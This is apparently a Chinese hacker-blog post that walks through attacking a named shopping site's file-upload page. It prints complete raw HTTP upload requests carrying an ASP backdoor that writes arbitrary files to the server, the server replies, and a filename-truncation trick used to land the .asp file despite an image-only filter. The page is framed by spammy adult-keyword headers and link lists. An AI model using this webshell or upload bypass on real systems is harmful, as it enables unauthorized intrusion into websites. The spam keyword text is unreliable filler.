国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

一次小小的上傳文件測試
2009-01-03   

下午5:52分,快吃晚飯了,這段時間里我比較喜歡給忙碌了一天的自己放短假,所以按照習慣就跑去幾個常去的黑客站點看看文章,武漢的315安全網我還是比較喜歡的,東西比較多而且更新的也還算及時。
記得看過一次315安全網里的一位兄臺做過一個他們服務器硬盤權限分配的動畫,了解到是一臺虛擬主機,用自己寫的程序跑了跑,看看有沒有什么可以利用的地方,發現了一個動感購物商城的上傳頁面,呵呵……
http://www.whdlwj.com/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpg
就抓了個包試試看上傳,包的結果如下:

POST /upfile_flash.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel,   application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.whdlwj.com/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpg
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d51863950254
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 1.1.4322)
Host: www.whdlwj.com
Content-Length: 3306
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCARBBDSS=NDPLMAIBCAFLEEMECJONPJJJ

-----------------------------7d51863950254
Content-Disposition: form-data; name="filepath"

bookpic/
-----------------------------7d51863950254
Content-Disposition: form-data; name="filelx"

jpg
-----------------------------7d51863950254
Content-Disposition: form-data; name="EditName"

bookpic
-----------------------------7d51863950254
Content-Disposition: form-data; name="FormName"

myform
-----------------------------7d51863950254
Content-Disposition: form-data; name="act"

uploadfile
-----------------------------7d51863950254
Content-Disposition: form-data; name="file1"; filename="G:\backdoor\網頁木馬\海陽ASP木馬\2005\改好的\save.asp"
Content-Type: application/octet-stream

<style type="text/css">
<!--
.unnamed1 {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 12px;
font-style: normal;
line-height: normal;
color: #000000;
text-decoration: none;
}
.style6 {color: #FF0033}
.style7 {color: #000000; }
.style8 {color: #0000FF}
-->
</style>
<div align="center">
<table width="372" border="1" align="center" class="unnamed1">
<tr>
<td align="center" valign="middle"><div align="center">
<p>
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red>Save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "<form action='' method=post>" %>
<% Response.write "保存文件的<font color=red>絕對路徑(包括文件名:如D:\web\sys.asp):</font>" %>
</p>
<p>
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
<% Response.Write "<br>" %>
</p>
<p>             
<% Response.write "本文件<font color=red>絕對路徑:</font>" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
</p>
<p>           
<% Response.write "<br>" %>
<% Response.write "輸入馬的內容:" %>
</p>
<p>
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
</p>
<p>
<% Response.write "<input type=submit value=Save>" %>
<% Response.write "</form>" %>
</p>
<p class="style7">Save File Workstation Beautify the version</p>
<p class="style6">  <span class="style8">----Power By Perl</span> </p>
</div></td>
</tr>
</table>
</div>
-----------------------------7d51863950254
Content-Disposition: form-data; name="Submit"

開始上傳
-----------------------------7d51863950254--

按照正常的手段改數據包先進行測試,提交結果返回為:
HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2005 10:05:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 493
Content-Type: text/html
Cache-control: private

<!--
┌─ o91.com───────────────┐
│  動感購物商務平臺WWW.SNSN.NET版權所有  │
│  設計:模糊視線13855119911 QQ:9912515 │
└────────────────────┘
-->

<link href="css.css" rel="stylesheet" type="text/css">
<font face="宋體" size=2>
<p>ADODB.Stream</font> <font face="宋體" size=2>錯誤 '800a0bbc'</font>
<p>
<font face="宋體" size=2>寫入文件失敗。</font>
<p>
<font face="宋體" size=2>/upload_wj.inc</font><font face="宋體" size=2>,行 181<
/font>

從返回數據得知根目錄限制了文件寫入,那我們就換一個目錄,將包里的上傳路徑改為bookpic/sys.asp,字節改為3314,提示如下:
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2005 10:07:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 472
Content-Type: text/html
Cache-control: private

<!--
┌─ o91.com───────────────┐
│  動感購物商務平臺WWW.SNSN.NET版權所有  │
│  設計:模糊視線13855119911 QQ:9912515 │
└────────────────────┘
-->

<link href="css.css" rel="stylesheet" type="text/css">
<script>window.opener.document.myform.bookpic.value='bookpic/sys.asp200541818754
95496.gif'</script>
<script language="javascript">
window.alert("文件上傳成功!請不要修改生成的鏈接地址!");
window.close();
</script>

嘿嘿,文件上傳成功,不過你別急,看清楚包的返回數據為bookpic/sys.asp20054181875495496.gif,打開這個文件來就是我們的后門文件代碼了。都到這個地方了,傳不上去有點不甘心,認真看看文件名bookpic/sys.asp20054181875495496.gif,怎么樣?有點想法沒有?呵呵……
我們的文件后綴.asp它還保留著呢,只不過在后面給我們加上了一段長長的字符串和gif后綴,讓我們的asp文件變成了gif文件。因為我沒有看過這套程序的上傳文件代碼,所以我就靠經驗來改改這個后門的數據包,讓它截斷后面的部分。改動之后的數據包如下:
POST /upfile_flash.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.whdlwj.com/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpg
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d51863950254
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 1.1.4322)
Host: www.whdlwj.com
Content-Length: 3316
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCARBBDSS=NDPLMAIBCAFLEEMECJONPJJJ

-----------------------------7d51863950254
Content-Disposition: form-data; name="filepath"

bookpic/wolf.asp
-----------------------------7d51863950254
Content-Disposition: form-data; name="filelx"

jpg
-----------------------------7d51863950254
Content-Disposition: form-data; name="EditName"

bookpic
-----------------------------7d51863950254
Content-Disposition: form-data; name="FormName"

myform
-----------------------------7d51863950254
Content-Disposition: form-data; name="act"

uploadfile
-----------------------------7d51863950254
Content-Disposition: form-data; name="file1"; filename="G:\backdoor\網頁木馬\海陽ASP木馬\2005\改好的\save.asp.gif"
Content-Type: application/octet-stream

<style type="text/css">
<!--
.unnamed1 {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 12px;
font-style: normal;
line-height: normal;
color: #000000;
text-decoration: none;
}
.style6 {color: #FF0033}
.style7 {color: #000000; }
.style8 {color: #0000FF}
-->
</style>
<div align="center">
<table width="372" border="1" align="center" class="unnamed1">
<tr>
<td align="center" valign="middle"><div align="center">
<p>
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red>Save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "<form action='' method=post>" %>
<% Response.write "保存文件的<font color=red>絕對路徑(包括文件名:如D:\web\sys.asp):</font>" %>
</p>
<p>
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
<% Response.Write "<br>" %>
</p>
<p>             
<% Response.write "本文件<font color=red>絕對路徑:</font>" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
</p>
<p>           
<% Response.write "<br>" %>
<% Response.write "輸入馬的內容:" %>
</p>
<p>
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
</p>
<p>
<% Response.write "<input type=submit value=Save>" %>
<% Response.write "</form>" %>
</p>
<p class="style7">Save File Workstation Beautify the version</p>
<p class="style6">  <span class="style8">----Power By Perl</span> </p>
</div></td>
</tr>
</table>
</div>
-----------------------------7d51863950254
Content-Disposition: form-data; name="Submit"

開始上傳
-----------------------------7d51863950254--

整個包的大體并沒變化,只需要將第一次修改的數據包里的G:\backdoor\網頁木馬\海陽ASP木馬\2005\改好的\save.gif改為G:\backdoor\網頁木馬\海陽ASP木馬\2005\改好的\save.asp.gif,其余不變,再傳一次。上傳的窗口一閃就關閉了(因為我是用了個BAT來執行提交的),嘿嘿……雖然看不到返回結果,不過我知道這個時候數據已經被我截斷了,文件也正常的變成了asp。再進后門看看,瀏覽器顯示:

該頁無法顯示
您試圖從目錄中執行 CGI、ISAPI 或其他可執行程序,但該目錄不允許執行程序。
--------------------------------------------------------------------------------

請嘗試以下操作:

如果您認為該目錄應該允許執行訪問權限,請與網站管理員聯系。
HTTP 錯誤 403.1 - 禁止訪問:執行訪問被拒絕。
Internet 信息服務 (IIS)

嘿嘿……有這個顯示就說明OK了,可以上傳ASP文件了,之后又換了換目錄試試,都不允許寫入文件^_^!。這個圖片目錄也不允許執行我們的后門。
畢竟是安全站點的主機,在目錄限制和權限設置這方面做的還可以,要不一會就被人黑了可就羞大了^_^。到這里,我做的整個測試就結束了,不知道看完了大家有什么感想,雖然并沒有拿到SHELL,其實我想突出講的一點是文章中的思路,以及平時需要的是多積累經驗,在應用的再多留心一點,那發現一點點小東西并不是特別的困難^_^。(文章看的不爽的別拿雞蛋丟,我吃的怕了,拿錢咂我好了,我窮啊~~~)。


熱詞搜索:

上一篇:提權,以MySQL之名
下一篇:trim()的漏洞破解與防護+文章始末

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
●精品国产综合乱码久久久久| 国产日韩高清在线| 狠狠色狠狠色综合日日91app| 成人听书哪个软件好| 91精品啪在线观看国产60岁| 亚洲国产一区视频| 91国产丝袜在线播放| 国产精品无圣光一区二区| 国产在线视视频有精品| 日韩一区二区三区电影在线观看| 亚洲精品网站在线观看| a4yy欧美一区二区三区| 国产精品久久99| 99久久国产综合精品女不卡| 最新国产精品久久精品| 99re在线精品| 1000精品久久久久久久久| 不卡大黄网站免费看| 亚洲视频你懂的| 日本韩国欧美在线| 亚洲成a人v欧美综合天堂| 欧美伦理影视网| 蜜桃av一区二区三区电影| 日韩一区二区三区在线| 久久99精品国产91久久来源| 精品久久久久香蕉网| 懂色av一区二区夜夜嗨| 亚洲人123区| 欧美色窝79yyyycom| 人人超碰91尤物精品国产| 欧美不卡一二三| av成人免费在线观看| 亚洲最大色网站| 精品久久久久久久久久久久久久久久久 | 欧美日韩国产美| 精品在线视频一区| 亚洲欧美自拍偷拍色图| 91精品国产色综合久久不卡电影 | 亚洲mv在线观看| 精品国产乱码久久久久久夜甘婷婷 | 亚洲免费大片在线观看| 欧美久久一二区| 国产成人在线视频免费播放| 一区二区三区毛片| 26uuuu精品一区二区| 色哟哟一区二区在线观看| 蜜桃视频一区二区| 亚洲欧美日韩成人高清在线一区| 欧美精品久久一区二区三区| 国产一区二区三区久久久| 亚洲乱码中文字幕| 久久亚洲春色中文字幕久久久| 色综合久久综合网97色综合| 狠狠色综合播放一区二区| 亚洲一区二区成人在线观看| 久久久不卡网国产精品一区| 欧美日韩免费一区二区三区视频| 国产精品中文欧美| 欧美96一区二区免费视频| 亚洲另类春色校园小说| 久久色视频免费观看| 欧美另类z0zxhd电影| 91色视频在线| 成人午夜精品在线| 另类欧美日韩国产在线| 婷婷久久综合九色综合绿巨人| 亚洲欧洲美洲综合色网| 久久精品亚洲一区二区三区浴池 | 亚洲国产成人av网| 中文字幕一区日韩精品欧美| 26uuu色噜噜精品一区| 777午夜精品免费视频| 欧美专区日韩专区| 色婷婷综合久色| 成人免费观看男女羞羞视频| 激情另类小说区图片区视频区| 午夜精品久久久久久久久久久| 亚洲精品视频观看| 成人欧美一区二区三区小说 | 久久婷婷久久一区二区三区| 欧美一卡2卡三卡4卡5免费| 在线看日本不卡| 在线亚洲一区观看| 在线观看日产精品| 欧美日韩一区二区在线观看| 欧美日韩一区二区三区在线| 欧美在线三级电影| 欧美喷潮久久久xxxxx| 欧美一区二区三区婷婷月色| 日韩一卡二卡三卡四卡| 日韩精品电影在线观看| 欧美一级高清大全免费观看| 91亚洲精品久久久蜜桃网站| 国产麻豆精品95视频| 秋霞午夜鲁丝一区二区老狼| 亚洲午夜久久久| 亚洲一区二区三区激情| 亚洲国产日韩a在线播放| 午夜欧美大尺度福利影院在线看| 亚洲成人免费电影| 亚洲精品美国一| 成人国产精品免费网站| 免费精品视频在线| 五月婷婷综合激情| 蜜臀av性久久久久av蜜臀妖精| 日韩高清一级片| 久久成人免费网| 国内成人自拍视频| 成人少妇影院yyyy| 在线观看91精品国产入口| 欧美日韩的一区二区| 日韩免费看网站| 国产精品天干天干在观线| 亚洲自拍偷拍九九九| 精彩视频一区二区三区| bt7086福利一区国产| 欧美日韩久久久一区| 国产欧美日韩中文久久| 亚洲午夜电影网| 国产乱人伦精品一区二区在线观看| av中文字幕不卡| 5858s免费视频成人| 国产嫩草影院久久久久| 丝袜亚洲另类欧美| 懂色av一区二区三区免费看| 欧美日韩亚洲丝袜制服| 国产日韩综合av| 日本亚洲电影天堂| 欧美视频中文字幕| 丁香另类激情小说| 欧美日韩综合一区| 精品裸体舞一区二区三区| 中文字幕va一区二区三区| 亚洲成人一二三| 国产精品2024| 欧美老人xxxx18| 国产精品免费人成网站| 日本免费新一区视频| 色综合色狠狠天天综合色| 国产视频一区在线观看| 免费在线观看不卡| 欧美图片一区二区三区| 国产亚洲人成网站| 免费精品视频在线| 6080国产精品一区二区| 亚洲一区在线免费观看| 国产高清不卡一区二区| 亚洲第一狼人社区| 成人免费av资源| 日韩一区二区精品葵司在线| 亚洲人成亚洲人成在线观看图片| 麻豆免费精品视频| 91麻豆精品国产综合久久久久久 | 一区二区三区在线影院| 亚洲色图视频网| 极品瑜伽女神91| 欧美一级二级在线观看| 夜色激情一区二区| 91福利精品视频| 综合激情成人伊人| 99v久久综合狠狠综合久久| 91论坛在线播放| 亚洲免费在线视频一区 二区| 亚洲视频精选在线| 国产999精品久久| 久久蜜桃av一区精品变态类天堂 | 中文字幕日韩一区| 成人app网站| 亚洲人成网站色在线观看| 91视频免费看| 亚洲一区二区五区| 欧美日韩精品免费观看视频| 亚洲一区二区三区在线看| 欧美三级韩国三级日本三斤| 亚洲妇熟xx妇色黄| 欧美一区二区三区性视频| 久久99精品久久久久久动态图| 中文字幕久久午夜不卡| 色婷婷av一区| 久久精品这里都是精品| 国内外成人在线| 日韩欧美综合一区| 国产一区久久久| 欧美精品一区二区三区蜜桃视频| 日韩国产欧美三级| 亚洲精品一区二区三区精华液 | 91小视频免费看| 亚洲高清免费视频| 日韩欧美黄色影院| 成人的网站免费观看| 一区二区三区在线观看欧美| 欧美夫妻性生活| 福利电影一区二区| 亚洲资源在线观看| 精品国产一区二区三区四区四| 成人国产亚洲欧美成人综合网 | 欧美变态凌虐bdsm| av影院午夜一区| 日本va欧美va瓶| 最新国产の精品合集bt伙计|